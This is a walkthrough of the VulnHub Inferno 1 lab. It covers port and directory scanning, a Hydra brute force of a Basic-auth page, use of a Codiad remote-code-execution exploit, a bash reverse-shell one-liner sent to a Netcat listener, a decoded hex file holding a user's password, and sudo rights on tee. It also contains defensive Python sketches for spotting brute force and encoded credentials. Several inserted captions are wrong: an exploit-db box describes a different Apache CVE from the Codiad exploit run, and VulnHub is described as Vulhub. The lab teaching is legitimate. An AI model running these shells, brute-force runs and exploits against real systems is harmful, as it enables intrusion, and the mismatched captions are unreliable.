Inferno 1 || VulnHub Complete walkthrough


Hello everyone, and welcome to this brand-new walkthrough. In today's tutorial, we will be dealing with a vulnerable machine, Inferno 1, categorized as "Easy/Medium" in terms of difficulty.


To begin with, you'll need to download the vulnerable image from the VulnHub website. If you're not familiar with VulnHub yet, feel free to check out the articles in the VulnHub playlist.

Vulhub - Vulnerable By Design

Vulhub is a collection of pre-built vulnerable docker environments that are designed for learning and practicing security testing. It provides various intentionally vulnerable web applications and services for hands-on security training.

After you've successfully downloaded the image, it's time to set up the server using VirtualBox, which is a straightforward process.


Setting up

1. First, launch VirtualBox, go to the "File" menu, and select "Import Appliance".

2. Import the downloaded ".ova" file. Browse your computer to locate the downloaded file and click "Next".

3. Review the appliance details and settings. You can keep the default settings or make adjustments based on your needs.

4. Click "Finish" to begin importing.

5. Once the import is done, the "inferno" vulnerable machine will appear in the VirtualBox Manager.

6. Select the virtual machine, click "Settings", and change the network adapter to "Host-only adapter".

Inferno: Host-only adapter

Make sure that both your Kali Linux machine, which is used for performing attacks, and your vulnerable machine are connected to the same network.

Kali Linux: Host-only Adapter

Once the setup is done, it's time to start the Virtual Machines. You'll notice that our Vulnerable Machine is all set, and we now have a login prompt waiting for us. 

Let's dive into the fun!

 

Enumeration

Enumeration is the first phase of our attack. We start by identifying the IP address of our target machine using NetDiscover. To do this, open a terminal and run the following command:

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.159.0/16   |   Screen View: Unique Hosts                                     
      
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.101  08:00:27:07:0a:e9      2     120  PCS Systemtechnik GmbH                                 
 192.168.95.107  0a:00:27:00:00:0e      1      60  Unknown vendor                                         
 192.168.95.113  08:00:27:60:22:3a      1      60  PCS Systemtechnik GmbH

From the scan result, we have obtained our target IP address, which is "192.168.95.113".


Network Discovery with Nmap

Next, we perform a network scan to detect which ports are open. Scanning the network is an essential part of the enumeration process. It allows us to understand the attack surface and plan targeted attacks. For this purpose, we'll use the popular Nmap tool. Use the following command on the terminal:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.113

Where,

  • -sC is used to perform a script scan using the default set of scripts.
  • -sV is used to enable version detection, which identifies the service version running on each port.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-26 01:52 EDT
Nmap scan report for 192.168.95.113
Host is up (0.0018s latency).
Not shown: 957 closed tcp ports (conn-refused)
PORT      STATE SERVICE           VERSION
21/tcp    open  ftp?
22/tcp    open  ssh               OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 82f4d24774862fb49462cd31f6ef51a4 (RSA)
|   256 01e902a3ffff4a7bf2201e0b449d7ff7 (ECDSA)
|_  256 a5dca7b12033f18dc7ddf1a3595dc234 (ED25519)
23/tcp    open  telnet?
25/tcp    open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp    open  domain?
80/tcp    open  http              Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Dante's Inferno
88/tcp    open  kerberos-sec?
106/tcp   open  pop3pw?
110/tcp   open  pop3?
389/tcp   open  ldap?
443/tcp   open  tcpwrapped
464/tcp   open  kpasswd5?
636/tcp   open  ldapssl?
777/tcp   open  multiling-http?
783/tcp   open  spamassassin?
808/tcp   open  ccproxy-http?
873/tcp   open  rsync?
1001/tcp  open  webpush?
1236/tcp  open  bvcontrol?
1300/tcp  open  h323hostcallsc?
2000/tcp  open  cisco-sccp?
2003/tcp  open  finger?
2121/tcp  open  ccproxy-ftp?
2601/tcp  open  zebra?
2602/tcp  open  ripd?
2604/tcp  open  ospfd?
2605/tcp  open  bgpd?
2607/tcp  open  connection?
2608/tcp  open  wag-service?
4224/tcp  open  xtell?
5051/tcp  open  ida-agent?
5432/tcp  open  postgresql?
5555/tcp  open  freeciv?
5666/tcp  open  nrpe?
6346/tcp  open  gnutella?
6566/tcp  open  sane-port?
6667/tcp  open  irc?
|_irc-info: Unable to open connection
8021/tcp  open  ftp-proxy?
8081/tcp  open  blackice-icecap?
8088/tcp  open  radan-http?
9418/tcp  open  git?
10000/tcp open  snet-sensor-mgmt?
10082/tcp open  amandaidx?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.69 seconds
       
┌──(kali㉿kali)-[~]
└─$ 

From the network scan, we have spotted several open ports, but only two of them report version details.

  • Port 22/TCP runs an SSH service, indicating that with valid credentials, gaining login access to the server will be straightforward.
  • Port 80/TCP runs an HTTP service, suggesting a vulnerable website is being hosted.


Web Enumeration and Directory Discovery with Gobuster

Now, let's explore the content of the website running on port 80. To look at the contents ourselves, open a web browser of your choice, and navigate to the target's IP address in the URL bar at the top of the window.

Upon visiting the webpage, we notice that it contains only some text and an image; there is no significant content.

To further enumerate the target URL, we need to perform directory busting to discover hidden or hard-to-access directories and pages. We'll use "gobuster" as our tool of choice, with the following command:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.113/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,js

Where,

  • gobuster dir is used to instruct gobuster to perform directory busting.
  • -u is used to specify the target URL we want to explore.
  • -w is used to provide the path to the wordlist containing common directory names to try.
  • -x is used to specify the file extensions to search for, which limits the search to those file types.

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.95.113/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,php,html,js
[+] Timeout:                 10s
===============================================================
2023/07/26 06:05:02 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 638]
/inferno              (Status: 401) [Size: 461]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1102451 / 1102805 (99.97%)
===============================================================
2023/07/26 06:11:12 Finished
===============================================================
       
┌──(kali㉿kali)-[~]
└─$ 

After performing the directory busting, we discovered 2 crucial web pages. One of them is "/inferno", with a status code of 401.

Status Code 401: This status code indicates that the client's request could not be completed because it lacks valid authentication credentials for accessing the requested resource. In simple terms, the webpage requires login credentials, and without them, access is restricted.

When I visit the webpage, I am greeted with a login prompt, asking for a username and password. To access the content on this webpage, I need to provide valid login credentials.

First, let's attempt to log in using some common credentials such as "admin:admin" and "admin:password".

Let's try to intercept the request using Burp Suite. Open Burp Suite and turn on Burp Proxy using FoxyProxy.

Go back to the "/inferno" webpage, and type a username and password again.

Unfortunately, we didn't find any helpful information, except for the "GET" request. Now, the only option left is to use brute force to find the username and password. For this purpose, we'll use a tool called "Hydra".

We use a common username wordlist and the famous "rockyou.txt" wordlist for passwords.

To perform the brute-force attack, use the following command:

┌──(kali㉿kali)-[~]
└─$ hydra -L '/home/kali/Downloads/top-usernames-shortlist.txt' -P '/usr/share/wordlists/rockyou.txt' 192.168.95.113 http-get /inferno -t 60
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-26 03:05:06
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 60 tasks per 1 server, overall 60 tasks, 243854783 login tries (l:17/p:14344399), ~4064247 tries per task
[DATA] attacking http-get://192.168.95.113:80/inferno
[80][http-get] host: 192.168.95.113   login: admin   password: dante1
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
       
┌──(kali㉿kali)-[~]
└─$ 

Once the brute-forcing is successful, we obtain the valid username and its corresponding password. With this information, we can visit the "/inferno" webpage and log into the server to view its content. Now, return to the browser and enter the username and password.
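From the defender's side, a run like this is very visible in the web server's access log: a burst of 401 responses for one protected path from one client, followed by a successful request. The sketch below is an added example, not part of the original walkthrough or of any tool used in it; the log lines are constructed samples in Apache's common log format, and the threshold and window values are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache common/combined log prefix: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (not taken from the target machine's logs).
SAMPLE_LOG = [
    # A normal user: the browser's first unauthenticated request, then a login.
    '192.168.95.50 - - [26/Jul/2023:03:04:50 -0400] "GET /inferno HTTP/1.1" 401 461',
    '192.168.95.50 - admin [26/Jul/2023:03:04:58 -0400] "GET /inferno HTTP/1.1" 301 322',
    # A password-guessing run: many user names, all rejected, then one accepted.
    '192.168.95.102 - root [26/Jul/2023:03:05:06 -0400] "GET /inferno HTTP/1.1" 401 461',
    '192.168.95.102 - test [26/Jul/2023:03:05:06 -0400] "GET /inferno HTTP/1.1" 401 461',
    '192.168.95.102 - guest [26/Jul/2023:03:05:07 -0400] "GET /inferno HTTP/1.1" 401 461',
    '192.168.95.102 - info [26/Jul/2023:03:05:07 -0400] "GET /inferno HTTP/1.1" 401 461',
    '192.168.95.102 - admin [26/Jul/2023:03:05:08 -0400] "GET /inferno HTTP/1.1" 401 461',
    '192.168.95.102 - admin [26/Jul/2023:03:05:09 -0400] "GET /inferno HTTP/1.1" 301 322',
]


def parse_line(line):
    """Return (ip, user, timestamp, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["path"].rstrip("/") or "/"   # treat /inferno and /inferno/ alike
    return m["ip"], m["user"], ts, path, int(m["status"])


def detect_basic_auth_bruteforce(lines, threshold=5, window=timedelta(seconds=10)):
    """Flag clients with >= threshold 401s on one path inside the window,
    and report when such a client later gets a non-error response."""
    recent = defaultdict(deque)    # (ip, path) -> timestamps of recent 401s
    tried = defaultdict(set)       # (ip, path) -> user names seen in 401s
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, user, ts, path, status = rec
        key = (ip, path)
        if status == 401:
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:      # drop failures older than the window
                q.popleft()
            if user != "-":
                tried[key].add(user)
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append({"type": "bruteforce", "ip": ip, "path": path,
                               "failures": len(q),
                               "usernames_tried": sorted(tried[key])})
        elif status < 400 and user != "-" and key in flagged:
            # The guessing client authenticated: treat the account as compromised.
            alerts.append({"type": "success_after_bruteforce", "ip": ip,
                           "path": path, "user": user})
            flagged.discard(key)           # report the success once
    return alerts


if __name__ == "__main__":
    for alert in detect_basic_auth_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second alert type is the one that matters most for response, because it names the account whose password has to be rotated.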

Upon successful login, you will be directed to the Codiad IDE web login page:

Codiad is a user-friendly, open-source web-based Integrated Development Environment (IDE) that offers a lightweight coding environment accessible through a web browser. With Codiad, developers can effortlessly write, edit, and manage their code using a web interface. This enables seamless project collaboration and flexibility, as developers can work on their projects from any device connected to the internet. 

In another article, we'll explore its installation steps and usage in more detail. Stay tuned!


Brute Forcing a Login Page to Obtain Credentials using Hydra

Let's attempt to log in using the previous password. 

Once we do, we'll access an IDE interface. The interface has a file explorer on the left side, allowing us to click on any file to view its content on the right side.

Let's check if we can remotely access the web server using the Codiad web-based IDE and try to exploit it on the server.

 

Exploiting Codiad for Remote Code Execution

After searching for "Codiad Remote code execution" on Google, I came across a suitable Python exploit on "exploit-db". I will now proceed to download the Python exploit from here.

Exploit Database - CVE-2021-41773: Apache 2.4.49 Path Traversal & RCE

This exploit is for CVE-2021-41773, a vulnerability in Apache HTTP Server 2.4.49. It allows an attacker to perform a path traversal attack and potentially execute remote code on vulnerable servers.


To execute this Python exploit, open a terminal and navigate to the Downloads directory where the Python exploit is stored. Use the "ls" command to list the files and directories in the current location, then run the exploit without arguments to see how it is used:

┌──(kali㉿kali)-[~]
└─$ cd Downloads
 
┌──(kali㉿kali)-[~/Downloads]
└─$ ls
49705.py
                                                                                                              
┌──(kali㉿kali)-[~/Downloads]
└─$ python 49705.py                                                                                   
Usage : 
        python 49705.py [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
        python 49705.py [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
Example : 
        python 49705.py http://localhost/ admin admin 8.8.8.8 8888 linux
        python 49705.py http://localhost:8080/ admin admin 8.8.8.8 8888 windows
Author : 
        WangYihang <[email protected]>
                            
┌──(kali㉿kali)-[~/Downloads]
└─$

After executing the Python file, we can see the usage instructions to run the exploit. We need to input specific information as provided in the usage. Use the following command:

┌──(kali㉿kali)-[~/Downloads]
└─$ python 49705.py http://192.168.95.113/inferno/ admin dante1 192.168.95.102 4444 linux 

Upon execution, the Python exploit instructs us to run two Netcat commands in other terminals. After starting both Netcat commands, we need to type "Y" to proceed further.

┌──(kali㉿kali)-[~/Downloads]
└─$ python 49705.py http://192.168.95.113/inferno/ admin dante1 192.168.95.102 4444 linux             
[+] Please execute the following command on your vps: 
echo 'bash -c "bash -i >/dev/tcp/192.168.95.102/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n] 

Run two NetCat commands on the terminal: 

Type "Y" to inject the remote code:

[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.95.113 Port 80</address>
</body></html>

[-] Login failed! Please check your username and password.
                             
┌──(kali㉿kali)-[~/Downloads]
└─$

The attempt to establish the remote connection failed. The 401 page in the output comes from Apache itself: the "/inferno" directory sits behind HTTP Basic authentication, and the exploit's login request was sent without those credentials.

However, there is an alternative format where you can directly include the username "admin" and password "dante1" in the URL itself, written as "admin:dante1@" immediately after "http://". This format is valid and will pass the provided credentials to the target server for authentication.

┌──(kali㉿kali)-[~/Downloads]
└─$ python 49705.py http://admin:dante1@192.168.95.113/inferno/ admin dante1 192.168.95.102 4444 linux

[+] Please execute the following command on your vps: 
echo 'bash -c "bash -i >/dev/tcp/192.168.95.102/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n]

Type "Y" to inject the exploit:

[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"admin"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"inferno","path":"\/var\/www\/html\/inferno"}}
[+] Writeable Path : /var/www/html/inferno
[+] Sending payload...

On the terminal running the second Netcat listener, we have successfully received a connection.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4445
listening on [any] 4445 ...
connect to [192.168.95.102] from (UNKNOWN) [192.168.95.113] 34520
bash: cannot set terminal process group (474): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Inferno:/var/www/html/inferno/components/filemanager$

However, the remote connection doesn't seem to be stable, so run the Python command below to spawn a pseudo-terminal, then set the terminal type to xterm.

www-data@Inferno:/var/www/html/inferno/components/filemanager$ python -c "import pty; pty.spawn('/bin/bash')"
<ger$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@Inferno:/var/www/html/inferno/components/filemanager$ export TERM=xterm
<l/inferno/components/filemanager$ export TERM=xterm
www-data@Inferno:/var/www/html/inferno/components/filemanager$

Even though we don't have a stable connection at the moment, we can still gather valuable information, which will help us in attempting an SSH connection. To do this, let's navigate to the "/home" directory and use the "ls" command to list the files and directories present.

www-data@Inferno:/var/www/html/inferno/components/filemanager$ cd /home
cd /home
www-data@Inferno:/home$ ls -al
ls -al
total 12
drwxr-xr-x  3 root  root  4096 Dec  6  2020 .
drwxr-xr-x 18 root  root  4096 Dec  6  2020 ..
drwxr-xr-x 11 dante dante 4096 Dec  6  2020 dante
www-data@Inferno:/home$

Among them, we notice a directory named "dante," which strongly suggests that it might be the username associated with the vulnerable server. This discovery can be crucial for further exploration and exploitation.

Now, let's carefully examine the files and directories to see if we can locate the password or any clues that the creator might have left behind. This information could be essential for advancing our exploration and gaining more access to the system.

Next, we'll navigate to the "dante" directory and use the "ls -al" command to list all files, including hidden ones, just like we do on any Linux platform.

www-data@Inferno:/home$ cd dante
cd dante
www-data@Inferno:/home/dante$ ls -al
ls -al
total 64
drwxr-xr-x 11 dante dante 4096 Dec  6  2020 .
drwxr-xr-x  3 root  root  4096 Dec  6  2020 ..
-rw-------  1 dante dante   52 Dec  6  2020 .Xauthority
lrwxrwxrwx  1 root  root     9 Dec  6  2020 .bash_history -> /dev/null
-rw-r--r--  1 dante dante  220 Dec  6  2020 .bash_logout
-rw-r--r--  1 dante dante 3526 Dec  6  2020 .bashrc
drwxr-xr-x  3 dante dante 4096 Dec  6  2020 .local
-rw-r--r--  1 dante dante  807 Dec  6  2020 .profile
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Desktop
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Documents
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Downloads
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Music
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Pictures
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Public
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Templates
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Videos
-rw-------  1 dante dante   33 Dec  6  2020 local.txt
www-data@Inferno:/home/dante$ cd Desktop         
cd Desktop
www-data@Inferno:/home/dante/Desktop$ ls -al
ls -al
total 248
drwxr-xr-x  2 root  root    4096 Dec  6  2020 .
drwxr-xr-x 11 dante dante   4096 Dec  6  2020 ..
-rwxr-xr-x  1 root  root   68416 Dec  6  2020 inferno.txt
-rwxr-xr-x  1 root  root   35456 Dec  6  2020 paradiso.txt
-rwxr-xr-x  1 root  root  138728 Dec  6  2020 purgatorio.txt
www-data@Inferno:/home/dante/Desktop$ cd ..
cd ..
www-data@Inferno:/home/dante$ cd Documents
cd Documents
www-data@Inferno:/home/dante/Documents$ ls -al
ls -al
total 472
drwxr-xr-x  2 root  root    4096 Dec  6  2020 .
drwxr-xr-x 11 dante dante   4096 Dec  6  2020 ..
-rwxr-xr-x  1 root  root   27400 Dec  6  2020 beatrice.doc
-rwxr-xr-x  1 root  root   68416 Dec  6  2020 caronte.doc
-rwxr-xr-x  1 root  root  138856 Dec  6  2020 centauro.doc
-rwxr-xr-x  1 root  root   97152 Dec  6  2020 cerbero.doc
-rwxr-xr-x  1 root  root  138728 Dec  6  2020 virgilio.doc
www-data@Inferno:/home/dante/Documents$ cd ..
cd ..
www-data@Inferno:/home/dante$ cd Downloads
cd Downloads
www-data@Inferno:/home/dante/Downloads$ ls -al
ls -al
total 8468
drwxr-xr-x  2 root  root     4096 Dec  6  2020 .
drwxr-xr-x 11 dante dante    4096 Dec  6  2020 ..
-rw-r--r--  1 root  root     1511 Nov  3  2020 .download.dat
-rwxr-xr-x  1 root  root   138728 Dec  6  2020 CantoI.docx
-rwxr-xr-x  1 root  root   146880 Dec  6  2020 CantoII.docx
-rwxr-xr-x  1 root  root    97152 Dec  6  2020 CantoIII.docx
-rwxr-xr-x  1 root  root    68416 Dec  6  2020 CantoIV.docx
-rwxr-xr-x  1 root  root   138856 Dec  6  2020 CantoIX.docx
-rwxr-xr-x  1 root  root    43808 Dec  6  2020 CantoV.docx
-rwxr-xr-x  1 root  root   138856 Dec  6  2020 CantoVI.docx
-rwxr-xr-x  1 root  root   146880 Dec  6  2020 CantoVII.docx
-rwxr-xr-x  1 root  root  3689352 Dec  6  2020 CantoVIII.docx
-rwxr-xr-x  1 root  root    68416 Dec  6  2020 CantoX.docx
-rwxr-xr-x  1 root  root   121464 Dec  6  2020 CantoXI.docx
-rwxr-xr-x  1 root  root   157192 Dec  6  2020 CantoXII.docx
-rwxr-xr-x  1 root  root   213136 Dec  6  2020 CantoXIII.docx
-rwxr-xr-x  1 root  root   146880 Dec  6  2020 CantoXIV.docx
-rwxr-xr-x  1 root  root   146880 Dec  6  2020 CantoXIX.docx
-rwxr-xr-x  1 root  root    97152 Dec  6  2020 CantoXV.docx
-rwxr-xr-x  1 root  root   138728 Dec  6  2020 CantoXVI.docx
-rwxr-xr-x  1 root  root   121464 Dec  6  2020 CantoXVII.docx
-rwxr-xr-x  1 root  root  2746104 Dec  6  2020 CantoXVIII.docx
-rwxr-xr-x  1 root  root    68416 Dec  6  2020 CantoXX.docx
www-data@Inferno:/home/dante/Downloads$

While exploring these directories, we came across an interesting file named ".download.dat". To see its contents, we use the "cat" command.

www-data@Inferno:/home/dante/Downloads$ cat .download.dat
cat .download.dat
c2 ab 4f 72 20 73 65 e2 80 99 20 74 75 20 71 75 65 6c 20 56 69 72 67 69 6c 69 6f 20 65 20 71 75 65 6c 6c 61 20 66 6f 6e 74 65 0a 63 68 65 20 73 70 61 6e 64 69 20 64 69 20 70 61 72 6c 61 72 20 73 c3 ac 20 6c 61 72 67 6f 20 66 69 75 6d 65 3f c2 bb 2c 0a 72 69 73 70 75 6f 73 e2 80 99 69 6f 20 6c 75 69 20 63 6f 6e 20 76 65 72 67 6f 67 6e 6f 73 61 20 66 72 6f 6e 74 65 2e 0a 0a c2 ab 4f 20 64 65 20 6c 69 20 61 6c 74 72 69 20 70 6f 65 74 69 20 6f 6e 6f 72 65 20 65 20 6c 75 6d 65 2c 0a 76 61 67 6c 69 61 6d 69 20 e2 80 99 6c 20 6c 75 6e 67 6f 20 73 74 75 64 69 6f 20 65 20 e2 80 99 6c 20 67 72 61 6e 64 65 20 61 6d 6f 72 65 0a 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 63 65 72 63 61 72 20 6c 6f 20 74 75 6f 20 76 6f 6c 75 6d 65 2e 0a 0a 54 75 20 73 65 e2 80 99 20 6c 6f 20 6d 69 6f 20 6d 61 65 73 74 72 6f 20 65 20 e2 80 99 6c 20 6d 69 6f 20 61 75 74 6f 72 65 2c 0a 74 75 20 73 65 e2 80 99 20 73 6f 6c 6f 20 63 6f 6c 75 69 20 64 61 20 63 75 e2 80 99 20 69 6f 20 74 6f 6c 73 69 0a 6c 6f 20 62 65 6c 6c 6f 20 73 74 69 6c 6f 20 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 6f 6e 6f 72 65 2e 0a 0a 56 65 64 69 20 6c 61 20 62 65 73 74 69 61 20 70 65 72 20 63 75 e2 80 99 20 69 6f 20 6d 69 20 76 6f 6c 73 69 3b 0a 61 69 75 74 61 6d 69 20 64 61 20 6c 65 69 2c 20 66 61 6d 6f 73 6f 20 73 61 67 67 69 6f 2c 0a 63 68 e2 80 99 65 6c 6c 61 20 6d 69 20 66 61 20 74 72 65 6d 61 72 20 6c 65 20 76 65 6e 65 20 65 20 69 20 70 6f 6c 73 69 c2 bb 2e 0a 0a 64 61 6e 74 65 3a 56 31 72 67 31 6c 31 30 68 33 6c 70 6d 33 0a
www-data@Inferno:/home/dante/Downloads$


Decoding HEX-Encoded Text with CyberChef

Inside the file, we find HEX-encoded text, which could be a crucial piece of information for gaining access to the server. We'll copy this text and proceed to decode it using CyberChef, a powerful tool for data manipulation and analysis.

CyberChef - The Cyber Swiss Army Knife

CyberChef is a powerful web application for encrypting, decrypting, and analyzing data. It provides a wide range of cryptographic, encoding, and data manipulation tools, making it a valuable asset for cybersecurity professionals and enthusiasts.


To decode the HEX codes, we'll visit CyberChef in our web browser.

First, we'll paste the HEX codes into the Input section. Then, in the Operations section, we'll search for "HEX" and drag and drop the "From Hex" operation into the Recipe section.

By checking the Output section, we successfully find the password for the user "dante".

With the valid username and its corresponding password, we are now equipped to gain access to the server using an SSH client tool.
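The lesson for whoever administers such a host is that hex encoding protects nothing: any world-readable file holding an encoded "user:password" line is a plaintext credential. The following audit sketch is an added example, not part of the original walkthrough; the sample dump is constructed in the code, and the account name "alice" and the credential-line pattern are assumptions. It performs the same decoding step as the CyberChef recipe, handles the multi-byte UTF-8 text such dumps can contain, and reports only the account name and secret length so the report itself does not leak the secret.

```python
import os
import re
import stat

HEX_TOKEN = re.compile(r"^[0-9a-fA-F]{2}$")
# Assumed shape of a stored credential: "<unix-style user>:<secret>" on its own line.
CRED_LINE = re.compile(r"^(?P<user>[a-z_][a-z0-9_-]{0,31}):(?P<secret>\S{6,})$")

# Constructed sample: a line of verse followed by a made-up credential,
# encoded the same way as the dump in the walkthrough (space-separated hex bytes).
SAMPLE_PLAINTEXT = "«Nel mezzo del cammin di nostra vita»\nalice:Constructed-Pass1\n"
SAMPLE_DUMP = " ".join(f"{b:02x}" for b in SAMPLE_PLAINTEXT.encode("utf-8"))


def decode_hex_dump(text):
    """Decode space-separated hex bytes to UTF-8 text; None if it is not such a dump."""
    tokens = text.split()
    # Require a minimum length so short ordinary words are not mistaken for hex.
    if len(tokens) < 8 or not all(HEX_TOKEN.match(t) for t in tokens):
        return None
    try:
        return bytes.fromhex("".join(tokens)).decode("utf-8")
    except UnicodeDecodeError:
        return None


def find_encoded_credentials(text, local_users):
    """Return (user, secret_length) for decoded lines naming a local account."""
    decoded = decode_hex_dump(text)
    if decoded is None:
        return []
    hits = []
    for line in decoded.splitlines():
        m = CRED_LINE.match(line.strip())
        if m and m["user"] in local_users:
            hits.append((m["user"], len(m["secret"])))
    return hits


def audit_file(path, local_users):
    """Check one file, but only if other users can read it (the o+r bit is set)."""
    if not os.stat(path).st_mode & stat.S_IROTH:
        return []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return find_encoded_credentials(fh.read(), local_users)


if __name__ == "__main__":
    print(find_encoded_credentials(SAMPLE_DUMP, {"alice", "root"}))
```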


Foothold

Since we have a valid username and password, let's establish a connection using an SSH client tool. Open a terminal and type "ssh" followed by the username and the host IP address.

┌──(kali㉿kali)-[~]
└─$ ssh dante@192.168.95.113
dante@192.168.95.113's password: 

When prompted, enter the password to establish the connection.

Linux Inferno 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 26 05:50:08 2023 from 192.168.95.102
dante@Inferno:~$ 

The SSH connection is stable, so let's take a look at the user flag.

Type the "ls" command to list the files and directories, and check whether a user flag is available.


dante@Inferno:~$ ls
Desktop  Documents  Downloads  local.txt   Music  Pictures  Public  Templates  Videos
dante@Inferno:~$

Here, we have the user flag in the "local.txt" file. Use the "cat" command to take a look at its content.

dante@Inferno:~$ cat local.txt  
77f***************************************35
dante@Inferno:~$

Now, our main focus is to acquire the root flag. 

dante@Inferno:~$ cd /root     
bash: cd: /root: Permission denied                                                                                               
dante@Inferno:~$

Navigating to the "/root" directory to obtain the root flag requires root permission, and we lack the necessary permissions to access it. Therefore, let's proceed with Privilege Escalation to elevate our privileges and gain access to the root flag.

 

Privilege Escalation

During privilege escalation, the first step is to gather information about the system and identify potential vulnerabilities or misconfigurations that could allow us to elevate our privileges to gain access to the root level.

First, enumerate the user's permissions to check the user's privileges and rights on the system. This can be done by running commands like "sudo -l" or "id" to see what commands the current user can run with elevated privileges.

Let me run the "id" command to find out the user and group names, and the numeric IDs, such as the UID and group IDs, of the current user.

dante@Inferno:~$ id
uid=1000(dante) gid=1000(dante) groups=1000(dante),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
dante@Inferno:~$

Upon running the " id " command, we discovered that both the UID and group belong to the user "dante".

Let's check the rights and privileges of the current user by running the "sudo -l" command:

dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
dante@Inferno:~$

After executing the command, we discover that the user "dante" has sudo privileges specifically for the "tee" application.


tee privilege escalation

"/usr/bin/tee" is a command-line tool used in Unix-like systems that allows users to read from one source (like the keyboard or a file), and then duplicate and send that input to both the screen (standard output) and one or more files. The name "tee" comes from its "T" shape, representing the splitting of the input into multiple streams.

In simple terms, when you use "tee" with a command or input, it shows the output on the screen as usual but also saves a copy of that output into specified files. This can be helpful when you want to keep a record of the output while still viewing it in real-time. It's commonly used in scripts and tasks where you need to capture and store data for later use.

After conducting a Google search for "tee privilege escalation", we came across a helpful blog that explains two methods to use the "tee" command-line tool for privilege escalation.

GTFOBins - tee

GTFOBins is a curated list of Unix binaries that can be exploited to bypass local security restrictions in misconfigured systems. The tee page in GTFOBins provides information on how to use the tee command for privilege escalation and other useful tricks.


